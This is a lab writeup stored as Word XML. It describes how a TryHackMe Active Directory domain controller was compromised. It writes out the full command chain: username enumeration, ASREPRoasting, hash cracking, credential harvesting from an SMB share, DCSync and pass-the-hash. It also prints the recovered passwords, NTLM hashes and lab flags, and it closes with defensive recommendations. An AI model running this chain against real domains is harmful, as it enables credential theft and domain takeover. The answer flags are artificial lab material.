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🏴 PENETRATION TEST REPORT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200"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4472C4"/>
          <w:sz w:val="64"/>
          <w:szCs w:val="64"/>
        </w:rPr>
        <w:t xml:space="preserve">Attacktive Directory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8"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Active Directory Domain Compromise</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="480"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="4472C4" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:jc w:val="center"/>
      </w:pP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Platform: TryHackMe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Target: 10.49.166.19  |  Domain: spookysec.local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March 27, 2026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Difficulty: Medium  |  Category: Active Directory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1. Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="4472C4" w:sz="6" w:space="1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report documents the complete compromise of an Active Directory Domain Controller on the TryHackMe platform's 'Attacktive Directory' room. Starting with zero credentials, a full Domain Admin takeover was achieved through a chain of AD-specific attack techniques including ASREPRoasting, SMB enumeration, and a DCSync attack.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before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engagement simulates a realistic internal network attack scenario targeting a Windows Server 2019 Domain Controller. All three user flags were successfully retrieved, culminating in Administrator-level access via a Pass-the-Hash attack.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing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10.49.166.19</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:t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spookysec.local</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:t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NetBIOS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THM-AD</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:t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Windows Server 2019 (Build 17763)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:t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Chain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ASREPRoast → Hash Crack → SMB Enum → DCSync → Pass-the-Hash</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:t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Full Domain Compromise — All 3 Flags Captured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2. Scope &amp; Methodology</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="4472C4" w:sz="6" w:space="1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attack followed a structured penetration testing methodology across five phases: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— Reconnaissance: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Port scanning and OS/service fingerprinting with nmap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— Enumeration: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SMB enumeration with enum4linux and Kerberos user discovery with Kerbrute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 — Exploitation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ASREPRoasting with Impacket GetNPUsers.py and hash cracking with Hashcat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4 — Post-Exploitation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SMB share access and credential harvesting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5 — Privilege Escalation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">DCSync attack and Pass-the-Hash to Domain Admin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="1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Tools Used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nmap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scanning &amp; service fingerprinting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enum4linux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SMB/NetBIOS enumeration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Kerbrute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Kerberos username enumeration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Impacket GetNPUsers.py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ASREPRoasting — extract Kerberos hashes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Hashcat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hash cracking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smbclient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SMB share access and file retrieval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Impacket secretsdump.py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DCSync — dump all AD password hashes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Evil-WinRM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 shell via Pass-the-Hash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3. Phase 1 — Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="4472C4" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="12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3.1 Nmap Port Scan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full aggressive nmap scan was performed to identify open ports, services, versions, and OS details.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100"/>
      </w:pP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sudo nmap -A -sS -sC -sV -O 10.49.166.19</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="14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53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— Domain Controller handles DNS for spookysec.local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88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Kerberos — Primary authentication protocol; target for ASREPRoasting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139/445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SMB/NetBIOS — File shares; target for credential harvesting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389/636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LDAP/LDAPS — Active Directory database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3389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RDP — Remote Desktop Protocol; Windows Terminal Services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spookysec.local (DNS_Domain_Name from nmap RDP banner)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NetBIOS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THM-AD (Target_Name from RDP NTLM info)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Server 2019 Build 17763</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="16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1F618D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The presence of port 88 (Kerberos) immediately confirmed this was an Active Directory Domain Controller. This opened the attack path for Kerberos-based enumeration and exploitation techniques.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4. Phase 2 — Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="4472C4" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="12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4.1 SMB Enumeration — enum4linux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SMB ports 139 and 445 were enumerated using enum4linux to extract domain information.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80"/>
      </w:pP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enum4linux 10.49.166.19</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before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Results confirmed the NetBIOS domain name THM-AD and domain SID, verifying a fully configured Active Directory environment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before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4.2 Kerberos User Enumeration — Kerbrute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domain was added to /etc/hosts for DNS resolution, then Kerbrute was used to brute-force valid usernames via Kerberos pre-authentication responses.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80"/>
      </w:pP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echo "10.49.166.19 spookysec.local" &gt;&gt; /etc/hosts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/opt/kerbrute userenum --dc spookysec.local -d spookysec.local userlist.txt -t 100</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="10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Valid Usernames Discovered (16 total)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james@spookysec.local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svc-admin@spookysec.local  ⚠️  Notable — service account, ASREPRoast target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robin@spookysec.local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darkstar@spookysec.local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administrator@spookysec.local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backup@spookysec.local  ⚠️  Notable — backup account with DCSync rights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paradox@spookysec.local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ori@spookysec.local</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="12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Two accounts stood out immediately: svc-admin (service accounts commonly have weak passwords and may have pre-authentication disabled) and backup (backup accounts on Domain Controllers often hold dangerous replication privileges used in DCSync attacks).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5. Phase 3 — Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="4472C4" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="12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5.1 ASREPRoasting — Extracting the Kerberos Hash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Impacket's GetNPUsers.py was used to request a Kerberos AS-REP ticket for svc-admin without a password. This works when an account has 'Do not require Kerberos preauthentication' enabled — a common misconfiguration in AD environments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80"/>
      </w:pP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 /opt/impacket/examples/GetNPUsers.py spookysec.local/svc-admin -request -no-pass -dc-ip 10.49.166.19</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before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attack successfully returned a Kerberos 5 AS-REP etype 23 hash (Hashcat mode 18200):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80"/>
      </w:pP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$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:bf930d0c...3c12df</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="8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backup account was also tested but did not have pre-authentication disabled, confirming svc-admin as the sole ASREPRoastable account.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before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5.2 Offline Hash Cracking — Hashcat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captured hash was saved to a file and cracked offline using Hashcat with the room-provided password wordlist. Offline cracking avoids any network noise or account lockout risk.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80"/>
      </w:pP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hashcat -m 18200 -a 0 svc-admin.hash passwordlist.txt --force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Hash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Kerberos 5 AS-REP etype 23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Hashcat Mode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18200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svc-admin@spookysec.local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management2005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to Crack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1 second (weak password, small targeted wordlist)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6. Phase 4 — Post-Exploitation (SMB)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="4472C4" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="12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6.1 SMB Share Enumeration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With svc-admin's credentials, SMB shares on the Domain Controller were enumerated using smbclient.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80"/>
      </w:pP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smbclient -U spookysec.local/svc-admin -L //10.49.166.19</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before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6 shares were discovered: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ADMIN$ — Default Windows admin share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C$ — Default drive share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IPC$ — Default IPC share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NETLOGON — Default DC logon share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SYSVOL — Default DC share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backup  ⚠️  Non-standard share — immediate red flag!</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="1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6.2 Accessing the Backup Share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non-standard 'backup' share was accessed and found to contain a credentials file.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80"/>
      </w:pP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smbclient -U spookysec.local/svc-admin //10.49.166.19/backup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smb: \&gt; get backup_credentials.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before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file contained a base64-encoded string which was decoded to reveal plaintext credentials:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80"/>
      </w:pP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echo "YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw" | base64 -d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backup@spookysec.local:backup2517860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backup@spookysec.local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backup2517860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backup_credentials.txt in \\10.49.166.19\backup SMB share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Encoding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Base64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7. Phase 5 — Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="4472C4" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="12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7.1 DCSync Attack — Dumping All Password Hashes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backup account possesses DCSync rights (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All), which allow it to replicate the entire AD database — including all NTLM password hashes — just like a legitimate Domain Controller would.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="8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Impacket's secretsdump.py was used to perform the DCSync attack via the DRSUAPI protocol:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80"/>
      </w:pP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 /opt/impacket/examples/secretsdump.py -dc-ip 10.49.166.19 spookysec.local/backup:backup2517860@10.49.166.19</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before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attack successfully dumped ALL domain account hashes using the DRSUAPI method. Key hashes retrieved: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Administrator NTLM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0e0363213e37b94221497260b0bcb4fc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krbtgt NTLM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0e2eb8158c27bed09861033026be4c21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svc-admin NTLM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fc0f1e5359e372aa1f69147375ba6809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backup NTLM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19741bde08e135f4b40f1ca9aab45538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DRSUAPI (DCSync via DS-Replication rights)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Accounts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accounts fully compromised</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before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7.2 Pass-the-Hash — Full Domain Admin Access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Administrator's NTLM hash was used directly to authenticate via Evil-WinRM without needing the plaintext password. This technique, known as Pass-the-Hash, exploits NTLM authentication which accepts the hash itself as proof of identity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80"/>
      </w:pP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evil-winrm -i 10.49.166.19 -u administrator -H 0e0363213e37b94221497260b0bcb4fc</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before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fully interactive PowerShell shell was obtained as Administrator — full Domain Admin access achieved.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8. Flags Captured</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="4472C4" w:sz="6" w:space="1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three flags were retrieved from user desktops via the Administrator Evil-WinRM shell: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 File</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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 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svc-admin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user.txt.txt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TryHackMe{K3rb3r0s_Pr3_4uth}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PrivEsc.txt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TryHackMe{B4ckM3UpSc0tty!}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root.txt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9"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">TryHackMe{4ctiveD1rectoryM4st3r}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9. Attack Chain Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="4472C4" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pP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 scan → Discovered open ports, confirmed Domain Controller, found domain spookysec.local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enum4linux → Confirmed THM-AD NetBIOS name, SMB accessible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Kerbrute → Enumerated 16 valid usernames; svc-admin and backup flagged as high-value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GetNPUsers.py → ASREPRoasted svc-admin, extracted Kerberos AS-REP hash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Hashcat → Cracked hash in &lt;1 second → password: management2005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smbclient → Listed 6 shares; accessed non-standard 'backup' share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smbclient → Retrieved backup_credentials.txt; base64 decoded → backup:backup2517860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secretsdump.py → DCSync attack dumped entire AD hash database via DRSUAPI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Evil-WinRM → Pass-the-Hash with Administrator NTLM → Full Domain Admin shell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retrieval → All 3 flags captured from user desktops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10. Real-World Impact &amp; Lessons</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="4472C4" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="12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10.1 Why This Attack Chain Is Dangerous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ASREPRoasting requires NO initial credentials </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">— any network-adjacent attacker can attempt it against any AD environment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Offline cracking </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">— once a hash is obtained, cracking attempts are invisible to defenders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DCSync = Total compromise </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">— with DCSync rights, every account in the domain is effectively compromised simultaneously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Pass-the-Hash </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">— attackers never need plaintext passwords; hashes alone grant full access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Backup credentials in SMB shares </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">— a single misconfigured share undid all other security measures</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="1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10.2 Defensive Recommendations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Disable 'Do not require Kerberos preauthentication' on all accounts unless absolutely necessary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Enforce strong password policies — 'management2005' cracked in under 1 second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Audit DCSync permissions regularly — only Domain Controllers should hold replication rights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Never store plaintext or encoded credentials in SMB shares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Enable Protected Users security group for privileged accounts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Deploy ATA/Defender for Identity to detect DCSync and Pass-the-Hash attacks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LAPS (Local Administrator Password Solution) for unique local admin passwords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Monitor for anomalous Kerberos AS-REP requests in event logs (Event ID 4768)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="1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10.3 Key Skills Demonstrated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Active Directory enumeration and attack methodology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Kerberos protocol abuse (ASREPRoasting)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Offline hash cracking with Hashcat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SMB share enumeration and credential harvesting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DCSync attack via Impacket secretsdump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Pass-the-Hash authentication bypass with Evil-WinRM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Structured penetration testing methodology (Recon → Enum → Exploit → PrivEsc → Flags)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11. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="4472C4" w:sz="6" w:space="1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Attacktive Directory room was successfully completed with full Domain Admin compromise. The attack chain demonstrated how a single weak Kerberos pre-authentication misconfiguration (svc-admin) can cascade into total domain takeover — a pattern seen in real-world breaches against organizations of all sizes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before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key takeaway: Active Directory security is only as strong as its weakest account configuration. One service account with pre-auth disabled, one SMB share with credentials, and one backup account with excessive privileges were enough to hand over the entire domain.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="12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This room mirrors real-world attack patterns used in major corporate breaches and is essential knowledge for any aspiring penetration tester, SOC analyst, or AD administrator.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="4472C4" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pP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Report —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TryHackMe: Attacktive Directory  |  spookysec.local  |  March 27,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472C4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4472C4"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:fldSimple w:instr="PAGE"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="888888"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">  |  TryHackMe: Attacktive Directory  |  spookysec.local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4" w:space="1"/>
      </w:pBdr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:b/>
        <w:bCs/>
        <w:color w:val="4472C4"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">TryHackMe — Attacktive Directory Writeup</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="888888"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">    |    Confidential Lab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1F618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2026-03-27T07:09:05.660Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-27T07:09:05.661Z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